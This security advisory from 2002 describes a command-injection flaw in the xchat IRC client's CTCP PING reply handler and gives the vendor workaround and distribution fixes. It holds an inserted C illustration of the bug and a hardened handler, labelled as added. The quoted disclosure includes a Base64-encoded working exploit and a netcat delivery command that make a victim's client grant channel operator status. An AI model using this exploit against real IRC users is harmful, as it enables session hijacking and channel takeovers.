SecurityTracker.com
Category: Application (Generic) > Xchat
Vendors: Zelezny, Peter
Xchat IRC Client Character Expansion Bug Lets a Remote User Hijack Another User's Session and Cause Commands to Be Sent to the IRC Server from the Hijacked Client
SecurityTracker Alert ID:  1003178
SecurityTracker URL:  http://securitytracker.com/id/1003178
CVE Reference:  GENERIC-MAP-NOMATCH
Date:  Jan 10 2002
Impact:   Execution of arbitrary code via network, Modification of user information, User access via network
Fix Available:  Yes
Vendor Confirmed:  Yes
Exploit Included:  Yes
Version(s): 1.4.2 and 1.4.3
Description:   A vulnerability was reported in the xchat IRC chat client. A remote user can hijack another user's session and cause the other user's xchat client to send commands to the client's current IRC server.

It is reported that the CTCP PING reply handler is designed to return the string that was sent to it by another client, so that the sender can determine the time lag between the two systems. The xchat client apparently has another feature that allows the insertion of arbitrary ASCII-valued characters into a message using the format "%nnn". In the vulnerable clients, the PING reply handler reportedly expands the "%nnn" values in the replies as well. A remote user can therefore send, inside a PING request, commands separated by "%010" line feed characters; the victim's client expands them and sends the result to its IRC server as additional commands.
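The following C program is an added illustration, not code from xchat, the vendor, or the source message. It re-creates the "%nnn" insertion feature as the description above characterises it, shows why a CTCP PING reply that runs attacker-supplied text through that expansion yields more than one protocol line, and contrasts that with the vendor workaround (expansion off) and a reply handler that never expands and rejects CR/LF. All function names, the treatment of "%nnn" values above 255, and the sample payload are assumptions constructed for this example.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Added example, not xchat's source: re-creation of the "%nnn" insertion
 * feature the advisory describes. "%065" becomes 'A', "%%" becomes a
 * literal '%'; "%nnn" with nnn > 255 is copied unchanged (an assumption).
 * Returns the number of bytes written to dst (dst is NUL-terminated). */
size_t expand_percent_ascii(const char *src, char *dst, size_t dstlen)
{
    size_t i = 0, o = 0;
    while (src[i] != '\0' && o + 1 < dstlen) {
        if (src[i] == '%' && src[i + 1] == '%') {
            dst[o++] = '%';
            i += 2;
            continue;
        }
        if (src[i] == '%' && isdigit((unsigned char)src[i + 1]) &&
            isdigit((unsigned char)src[i + 2]) && isdigit((unsigned char)src[i + 3])) {
            int v = (src[i + 1] - '0') * 100 + (src[i + 2] - '0') * 10 + (src[i + 3] - '0');
            if (v < 256) {
                dst[o++] = (char)v; /* "%010" yields '\n' here: the root of the bug */
                i += 4;
                continue;
            }
        }
        dst[o++] = src[i++]; /* ordinary byte, or a "%nnn" above 255 copied as-is */
    }
    dst[o] = '\0';
    return o;
}

/* Number of IRC protocol lines a server would parse from buf. A reply to
 * one CTCP PING must produce exactly one. */
int count_irc_lines(const char *buf)
{
    int lines = 0, in_line = 0;
    for (; *buf != '\0'; buf++) {
        if (*buf == '\n') { if (in_line) lines++; in_line = 0; }
        else if (*buf != '\r') in_line = 1;
    }
    return lines + (in_line ? 1 : 0);
}

/* Vulnerable reply path: the attacker-supplied PING text goes through %nnn
 * expansion whenever the percascii option is on (1 models the old default). */
int build_ping_reply_vulnerable(const char *nick, const char *payload, int percascii, char *out, size_t outlen)
{
    char text[512];
    if (percascii)
        expand_percent_ascii(payload, text, sizeof text);
    else
        snprintf(text, sizeof text, "%s", payload);
    return snprintf(out, outlen, "NOTICE %s :\001PING %s\001\r\n", nick, text);
}

/* Hardened reply path: echoes the text byte-for-byte (no expansion) and
 * refuses any payload carrying CR or LF. Returns -1 when rejected. */
int build_ping_reply_hardened(const char *nick, const char *payload, char *out, size_t outlen)
{
    if (strpbrk(payload, "\r\n") != NULL)
        return -1;
    return snprintf(out, outlen, "NOTICE %s :\001PING %s\001\r\n", nick, payload);
}

/* Self-check helpers so the behaviour can be asserted on, not just printed. */
int expansion_equals(const char *src, const char *expected)
{
    char buf[256];
    expand_percent_ascii(src, buf, sizeof buf);
    return strcmp(buf, expected) == 0;
}
int vulnerable_line_count(const char *payload, int percascii)
{
    char out[512];
    build_ping_reply_vulnerable("Victim", payload, percascii, out, sizeof out);
    return count_irc_lines(out);
}
int hardened_accepts(const char *payload)
{
    char out[512];
    return build_ping_reply_hardened("Victim", payload, out, sizeof out) >= 0;
}

int main(void)
{
    /* Constructed sample: a harmless JOIN wrapped in "%010" line feeds. */
    const char *payload = "12345%010JOIN #constructed-test%010";
    printf("percascii=1: %d protocol line(s)\n", vulnerable_line_count(payload, 1));
    printf("percascii=0: %d protocol line(s)\n", vulnerable_line_count(payload, 0));
    printf("hardened:    %s\n", hardened_accepts(payload) ? "sent as one line" : "rejected");
    return 0;
}
```

With expansion on, the reply to the sample payload is split by the server into three lines, the second of which is a command the victim never typed; with the `percascii` option off, or with the hardened handler, it stays one line. The CR/LF check in the hardened path only helps if it runs on the bytes that actually reach the socket, so a client that applies generic expansion later in its output path must validate after that step, not before.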

A demonstration exploit is provided in the Source Message (it is Base64-encoded).

Impact:   A remote user can hijack another user's session and cause the other user's xchat client to send commands to the client's current IRC server.
Solution:   The vendor has provided the following workaround to disable ASCII expansion:

/set percascii 0

Also, a fixed version (1.8.7) is available at the Vendor URL.

Vendor URL:  www.xchat.org/
Cause:   Input validation error
Underlying OS:   Linux (Any), MacOS, UNIX (Any), Windows (Any)

Message History:   This archive entry has one or more follow-up message(s) listed below.
(Debian Issues Fix) Xchat IRC Client Character Expansion Bug Lets a Remote User Hijack Another User's Session and Cause Commands to Be Sent to the IRC Server from the Hijacked Client   (joey@debian.org (Martin Schulze))
The vendor has released a fix.
(Red Hat Issues Fix) Xchat IRC Client Character Expansion Bug Lets a Remote User Hijack Another User's Session and Cause Commands to Be Sent to the IRC Server from the Hijacked Client   (bugzilla@redhat.com)
The vendor has released a fix.
(Mandrake Issues Fix) Xchat IRC Client Character Expansion Bug Lets a Remote User Hijack Another User's Session and Cause Commands to Be Sent to the IRC Server from the Hijacked Client   (Mandrake Linux Security Team <security@linux-mandrake.com>)
The vendor has released a fix.
(Conectiva Issues Fix) Xchat IRC Client Character Expansion Bug Lets a Remote User Hijack Another User's Session and Cause Commands to Be Sent to the IRC Server from the Hijacked Client   (secure@conectiva.com.br)
The vendor has released a fix.



Source Message Contents

Date:  Wed, 9 Jan 2002 22:45:13 +1300 (NZDT)
Subject:  xchat IRC session hijacking vulnerability (versions 1.4.1, 1.4.2)


==========================================================================
======= xchat 1.4.2 and 1.4.3 IRC session hijacking vulnerability ========
==========================================================================

  It is possible to trick xchat IRC clients (1.4.2, 1.4.3) into sending 
  commands to the IRC server they are on, potentially allowing for social 
  engineering attacks, channel takeovers, and denial of service.

               Vendor updates for affected versions soon.

==========================================================================
================================ Background ==============================
==========================================================================

The CTCP PING reply handler is designed to return the string that was sent
to it by another client. This enables that client to determine the time 
lag between them and another user.

The querying client types
  /ping nick
which sends a command of the form:
  PRIVMSG nick :\x01PING 1027050764\x01\n

Where "1027050764" was some representation of the current time, and \x01 
is the character with the ASCII value 0x01.
The queried client would respond with:
  NOTICE nick :\x01PING 1027050764\x01\n
and the querying client would then compare the current time with the time 
in the string.

If you sent "test 1 2 3 4" as the time part, xchat would reply with the 
same string.

The xchat client also has a feature which allows insertion of arbitrary 
ascii valued characters into a message. 

The message "This is %065 test." gets sent as "This is A test." to the
server. (This option is disabled by default in later versions.)

If these expressions are expanded on the sending client, a ping message
could be sent to a user with the command:
  /msg nick %001PING 12345678%001 
which would send a string like:
  PRIVMSG nick :\x01PING 12345678\x01

(To disable expansion in xchat when you are typing them, use '%%nnn' to 
send the '%nnn' literal. Eg: to send '%100x', type '%%100x' in the 
client. If your client does expansion, it would show up as 'dx', which 
can be quite annoying when discussing format strings.)

==========================================================================
=============================== The Problem ==============================
==========================================================================

The PING reply handler also expands the %nnn values in replies in the 
vulnerable clients.

Example exploit, By Marcus Meissner <Marcus.Meissner@caldera.de>

#fupp is a channel.
Victim is on it and has channel op status.


Enter the command: cat xchat.exploit - | netcat server 6667 

(The - is necessary so we do not quit instantly)

This causes vulnerable 'Victim' to give user 'exploit' channel operator
status in channel '#fupp' on server 'server'.


-- zen-parse


Attachment: xchat.exploit (Content-Transfer-Encoding: BASE64)

dXNlciBleHBsb2l0IGZvbyBiYXI6IEV4cGxvaXQgVGVzdGVyDQpuaWNrIEV4
cGxvaXQNCmpvaW4gI2Z1cHANCnByaXZtc2cgVmljdGltIDoBUElORyAxJTAx
ME1PREUgI2Z1cHAgK28gRXhwbG9pdCUwMTABDQoNCg==

 
 


Copyright 2013, SecurityGlobal.net LLC